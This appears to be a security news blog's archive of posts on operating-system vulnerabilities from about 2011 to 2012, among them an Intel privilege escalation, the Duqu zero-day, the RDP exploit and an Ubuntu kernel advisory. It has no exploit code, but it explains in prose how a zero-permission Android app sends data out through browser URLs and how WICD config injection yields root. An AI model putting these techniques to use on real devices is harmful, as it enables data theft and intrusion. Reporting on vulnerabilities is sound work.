Search This Blog

Showing posts with label OS Vulnerability. Show all posts

64-bit OS & virtualization software running on Intel CPU vulnerable to local privilege escalation

A critical security vulnerability has been discovered in the 64 bit operating system and virtualization software running on Intel CPU , which leads to privilege Escalation exploit or a guest-to-host virtual machine escape.

The problem affects 64-bit versions of Windows, Linux, FreeBSD and the Xen hypervisor. The flaw seems to only affect Intel hardware – AMDand ARM CPUs are not affected.

"A ring3 attacker may be able to specifically craft a stack frame to be executed by ring0 (kernel) after a general protection exception (#GP)."US-CERT's vulnerability report reads.

" The fault will be handled before the stack switch, which means the exception handler will be run at ring0 with an attacker's chosen RSP causing a privilege escalation. "

Metasploit penetration testing framework founder H.D. Moore characterized the bug as a "serious guest-to-host escape vulnerability," noting that while it affects the Xen platform, it doesn't affect VMware.

To this end, operating system specific details on the vulnerability have been published by Xen, FreeBSD and Microsoft. Linux vendor Red Hat has also published two updates on the problem: RHSA-2012:0720-1 and RHSA-2012:0721-1.

To close the security hole, users should apply updates from their operating system supplier.

'No permissions' Android app can access sensitive data

A security researcher ,Paul Brodeur, from Leviathan Security Group, has created a proof-of-concept app called "No Permissions" that demonstrate how an android application which doesn't ask for any security permission is still able to access to your sensitive data.

Usually, whenever android user try to install an app, a screen will be displayed to asks users to approve the permission requested by app. The purpose of Android Permissions is to let you know exactly what information an app maker is harvesting from your device, so you can make an informed decision over whether or not you want to install it. An app needs your permission to do even trivial tasks like performing network access, keeping the device awake.

According to Paul's research, even an Android app with zero permissions are able to access the sensitive  data from your devices. His app which doesn't ask for any permissions is still able to access files on SD card, files stored by other apps and handset identification data.

In order to send collected information to the criminal, app will need INTERNET permission. Unfortunately, there is one network call that can be made without any permissions.

"the URI ACTION_VIEW Intent opens a browser. By passing data via GET parameters in a URI, the browser will exfiltrate any collected data. In my tests, I found that the app is able to launch the browser even after it has lost focus, allowing for transmission of large amounts of data by creating successive browser calls." researcher explained.

He tested the app against Android 4.0.3 and Android 2.3.5.  If you are curious to know the capabilities of the app, then you can download it from here.

WICD privilege escalation 0day affects Backtrack Linux

A student from Infosec Institute managed to find a zero-day vulnerability in Wireless Interface Connection Daemon(WICD) affecting the Backtrack 5.

The discovery has been published on InfoSec's own website and detailed by the student himself, who says that the Wireless Interface Connection Daemon (WICD) has several design flaws that can be misused to execute a privilege escalation exploit.

Improper sanitization of the inputs in the WICD's DBUS interfaces allows an attacker to (semi)arbitrarily write configuration options in WICD's 'wireless-settings.conf' file, including but not limited to defining scripts (executables actually) to execute upon various internal events (for instance upon connecting to a wireless network).

These scripts execute as the root user, this leads to arbitrary code/command execution by an attacker with access to the WICD DBUS interface as the root user.
At the first , researchers incorrectly named the vulnerability as "Backtrack 5 R2 priv escalation 0day ".  Later realized the mistake and change the name to "wicd Privilege Escalation 0Day". They apologized for the confusion to the Backtrack team and any other persons affected by this error.

"To summarise, we believe that the intentional misrepresentation of this bug report has discredited BackTrack unecessarily in the eyes of those who do not understand the underlying mechanisms of our OS, and also discredited the Infosec Institute in the eyes of those who do." Backtrack commented on this issue. 
The wicd team has released a new version that fixes this bug (CVE-2012-2095).

Hackers developed Exploit code for RDP vulnerability

Chinese Hackers have released a proof of concept[POC] code that tries to exploit the recently patched windows RDP vulnerability. When Microsoft released the patch for RDP vulnerability, they urged customers to update their product as soon as possible, especially since they were expecting that an exploit would be developed in the next 30 days. But, Hackers took less than three days and released a working POC.

SophosLabs researchers found one Chinese website has exploit code written in Python scripts. The code attempts to exploit the MS12-020 RDP vulnerability and causes Windows computers to blue screen.

Even though the script only cause a blue screen death for now, the hackers wont' take long time to develop the exploit to produce a fast-spreading internet worm.

Also researchers come across a fake exploits for the Microsoft RDP vulnerability that claims to be the Python script of a worm .  "It references a Python module that doesn't exist (FreeRDP), and claims to be written by, an obvious reference to the high profile Anonymous hacker who was recently revealed to have been secretly working for the FBI for months."Researcher said.

Hackers offer more than 1400$ for developing windows RDP exploit

A website called , where software developers can hire each other , has an ad that promise to award more than $1400(currently it is $1451) to the first person who develop working exploit for the windows RDP vulnerability.

As it is listed as Open source bounty , the reward will increase each passing day. Security journalist Brian Krebs came across this website, the bounty is $1,435.

Microsoft already patched this vulnerability and urged users to update their product. However lot of users fail to update , which is why cyber criminals are rushing to get a working exploit released.

"I'd like to see a working exploit for CVE-2012-0002 (the new RDP hole) as a Metasploit module." a user named Rich said.

Krebs said that the current bounty offered for the exploit is almost certainly far less than the price such a weapon could command the underground market, or even what a legitimate vulnerability research company like TippingPoint might pay for such research.

Forensics Vendor Passware warns Mac OS X FileVault 2 easily decrypted

Passware, Inc., a provider of password recovery for law enforcement, issued a warning that its Forensic Tools capable of breaking the Disk encryption security in Mac OS.

FileVault provides 128bit AES encryption of all files located within your home directory of Mac OS X. A master password (and recovery key in 10.7+) is created as a precaution against a user losing their password.

Passware Kit Forensic v11.3: can decrypt the a FileVault-encrypted Mac disk within 40 minutes-regardless of the length or complexity of the password. Passware says its utilities can now easily gain a FileVault encryption key from the target computer memory, which provides full access to the encrypted Mac hard disk.

“Full disk encryption is becoming a major obstacle for digital investigations,” said Dmitry Sumin, president, Passware, Inc. “The latest version of Passware Kit Forensic offers multiple approaches to overcoming this problem, such as live memory analysis and extraction of encryption keys for BitLocker, TrueCrypt, and FileVault. This means forensic experts are better armed to approach investigative
challenges with an effective and efficient solution that significantly reduces decryption time and thus allows investigators to focus on data analysis."

Passware Kit Forensic is available directly from Passware for $995 with one year of free updates. PassWare makes this software primarily available for law enforcement.

Critical Zero-Day Vulnerability found in 64 bit version of Windows 7

webDEViL,a Security Researcher from Secunia discovered a new Zero-day vulnerability in 64 bit version of Windows 7 that allows an attacker to compromise the vulnerable machine.

A Researcher w3bd3vil shared a tweet in Twitter that he discovered a vulnerability that a method for exploiting the vulnerability by simply feeding an iframe with an overly large height to Safari.

"The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large "height" attribute viewed using the Apple Safari browser.

Successful exploitation may allow execution of arbitrary code with kernel-mode privileges." Secunia report says.

Critical Vulnerability found in Apple Mac OS X Sandbox Mechanisms

CoreLabs Researchers discovered critical Vulnerability in Mac OS X's sandboxing mechanisms.They published the Advisory information on Nov 10,2011.

Vulnerability Description

Several of the default pre-defined sandbox profiles don't properly limit all the available mechanisms and therefore allow exercising part of the restricted functionality. Namely, sending Apple events is possible within the no-network sandbox (kSBXProfileNoNetwork). A compromised application hypothetically restricted by the use of the no-network profile may have access to network resources through the use of Apple events to invoke the execution of other applications not directly restricted by the sandbox.

It is worth mentioning that a similar issue was reported by Charlie Miller in his talk at Black Hat Japan 2008 . He mentioned a few processes sandboxed by default as well as a method to circumvent the protection. Sometime after the talk, Apple modified the mentioned profiles by restricting the use of Apple events but did not modify the generic profiles.

According to the Advisory,Apple Mac OS X 10.7.x,10.6.x,10.5.x are vulnerable .

Apple Mac OS X 10.4 is non-vulnerable. 

Apple Exiles Charlie Miller( A Serial Hacker) for publishing iPhone exploit

 Apple exiles a Security Researcher Charlie Miller from its developer program.Apple just sent a clear message to malicious hackers and security researchers alike: Keep your hands off the App Store.

He has exposed lot of critical vulnerabilities in Apple's Mac and mobile platforms.  Recently, he has found a way to sneak a fully-evil app onto your phone or tablet, right under Apple’s nose.

At the SysCan conference in Taiwan next week, Miller plans to present a method that exploits a flaw in Apple’s restrictions on code signing on iOS devices, the security measure that allows only Apple-approved commands to run in an iPhone or iPad’s memory. Using his method–and Miller has already planted a sleeper app in Apple’s App Store to demonstrate the trick–an app can phone home to a remote computer that downloads new unapproved commands onto the device and executes them at will, including stealing the user’s photos, reading contacts, making the phone vibrate or play sounds, or otherwise repurposing normal iOS app functions for malicious ends.

“Now you could have a program in the App Store like Angry Birds that can run new code on your phone that Apple never had a chance to check,” says Miller. “With this bug, you can’t be assured of anything you download from the App Store behaving nicely.”

After few hours, Apple send an email that informed "This letter serves as notice of termination of the iOS Developer Program License Agreement…between you and Apple".

Video Demo of iPhone Bug:

In February, Apple invited security researchers to become part of its developer program to test its Lion operating system. Miller says he had already paid for his own developer license. “They went out of their way to let researchers in, and now they’re kicking me out for doing research,” Miller says. “I didn’t have to report this bug. Some bad guy could have found it instead and developed real malware.”

According to Forbes, the Miller’s application has now been removed from the App Store.

Zero-day Vulnerability in Windows Kernel exploited by Duqu worm

Zero-Day Vulnerability found in Windows Kernel by Researchers at the Cryptography and System Security (CrySyS) Lab, as the result of Analyzing the Duqu malware.  CrySys immediately reported to the Microsoft about the vulnerability.

CrySys discovered the Duqu Binaries and confirmed that it is nearly identical to Stuxnet.Thus far, no-one had been able to find the installer for the threat and therefore no-one had any idea how Duqu was initially infecting systems.

As the result of Research, CrySys found the installer as Microsoft word document file(.doc) that use a previously unknown kernel vulnerability.  When the .doc file is opened, the Duqu infects the system.

W32.Duqu is a worm that opens a back door and downloads more files on to the compromised computer. It also has rootkit functionality and may steal information from the compromised computer.

Duqu Infection:

"The Word document was crafted in such a way as to definitively target the intended receiving organization. Furthermore, the shell-code ensured that Duqu would only be installed during an eight-day window in August. Please note that this installer is the only installer to have been recovered at the time of writing—the attackers may have used other methods of infection in different organizations.", Symantec Report.

Once the system infected by Duqu, the attacker can control the system and infects other organization through the Social Engineering.  In one organization, evidence was found that showed the attackers commanding Duqu to spread across SMB shares.

Even though the system didn't have the ability to connect to the Internet , the Malware  configured such that to communicate with C&C Server using other infected system that has Internet connection.

Consequently, Duqu creates a bridge between the network's internal servers and the C&C server. This allowed the attackers to access Duqu infections in secure zones with the help of computers outside the secure zone being used as proxies.

Several Countries become the victim of this Duqu malware.  According to Symantec report, there are 8 countries infected by this malware.

As the result of Analysis, the researcher discovered that malware contacts a server hosted in India.

"Microsoft is collaborating with our partners to provide protections for a vulnerability used in targeted attempts to infect computers with the Duqu malware. We are working diligently to address this issue and will release a security update for customers through our security bulletin process," Jerry Bryant, group manager of response communications in Microsoft's Trustworthy Computing group said in a statement

updated whitepaper (version 1.3) from Symantec .

Ubuntu 10.10 vulnerable to system crash and DOS attack

kernel incorrectly handled certain VLAN packets leading to a remote attacker could send specially crafted traffic to crash the system, leading to a denial of service. EFI GUID partition table was not correctly parsed leading to  A physically local attacker that could insert mountable devices could exploit this to crash the system or possibly gain root privileges.
Ubuntu Security Notice USN-1220-1
September 29, 2011

linux-ti-omap4 vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 10.10


Multiple kernel flaws have been fixed.

Software Description:
- linux-ti-omap4: Linux kernel for OMAP4


Ryan Sweat discovered that the kernel incorrectly handled certain VLAN
packets. On some systems, a remote attacker could send specially crafted
traffic to crash the system, leading to a denial of service.

Timo Warns discovered that the EFI GUID partition table was not correctly
parsed. A physically local attacker that could insert mountable devices
could exploit this to crash the system or possibly gain root privileges.

Dan Rosenberg discovered that the IPv4 diagnostic routines did not
correctly validate certain requests. A local attacker could exploit this to
consume CPU resources, leading to a denial of service. (CVE-2011-2213)

Dan Rosenberg discovered that the Bluetooth stack incorrectly handled
certain L2CAP requests. If a system was using Bluetooth, a remote attacker
could send specially crafted traffic to crash the system or gain root
privileges. (CVE-2011-2497)

Mauro Carvalho Chehab discovered that the si4713 radio driver did not
correctly check the length of memory copies. If this hardware was
available, a local attacker could exploit this to crash the system or gain
root privileges. (CVE-2011-2700)

Herbert Xu discovered that certain fields were incorrectly handled when
Generic Receive Offload (CVE-2011-2723)

Time Warns discovered that long symlinks were incorrectly handled on Be
filesystems. A local attacker could exploit this with a malformed Be
filesystem and crash the system, leading to a denial of service.

Dan Kaminsky discovered that the kernel incorrectly handled random sequence
number generation. An attacker could use this flaw to possibly predict
sequence numbers and inject packets. (CVE-2011-3188)

Darren Lavender discovered that the CIFS client incorrectly handled certain
large values. A remote attacker with a malicious server could exploit this
to crash the system or possibly execute arbitrary code as the root user.

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 10.10:
linux-image-2.6.35-903-omap4 2.6.35-903.25

After a standard system update you need to reboot your computer to make
all the necessary changes.

CVE-2011-1576, CVE-2011-1776, CVE-2011-2213, CVE-2011-2497,
CVE-2011-2700, CVE-2011-2723, CVE-2011-2928, CVE-2011-3188,

Package Information: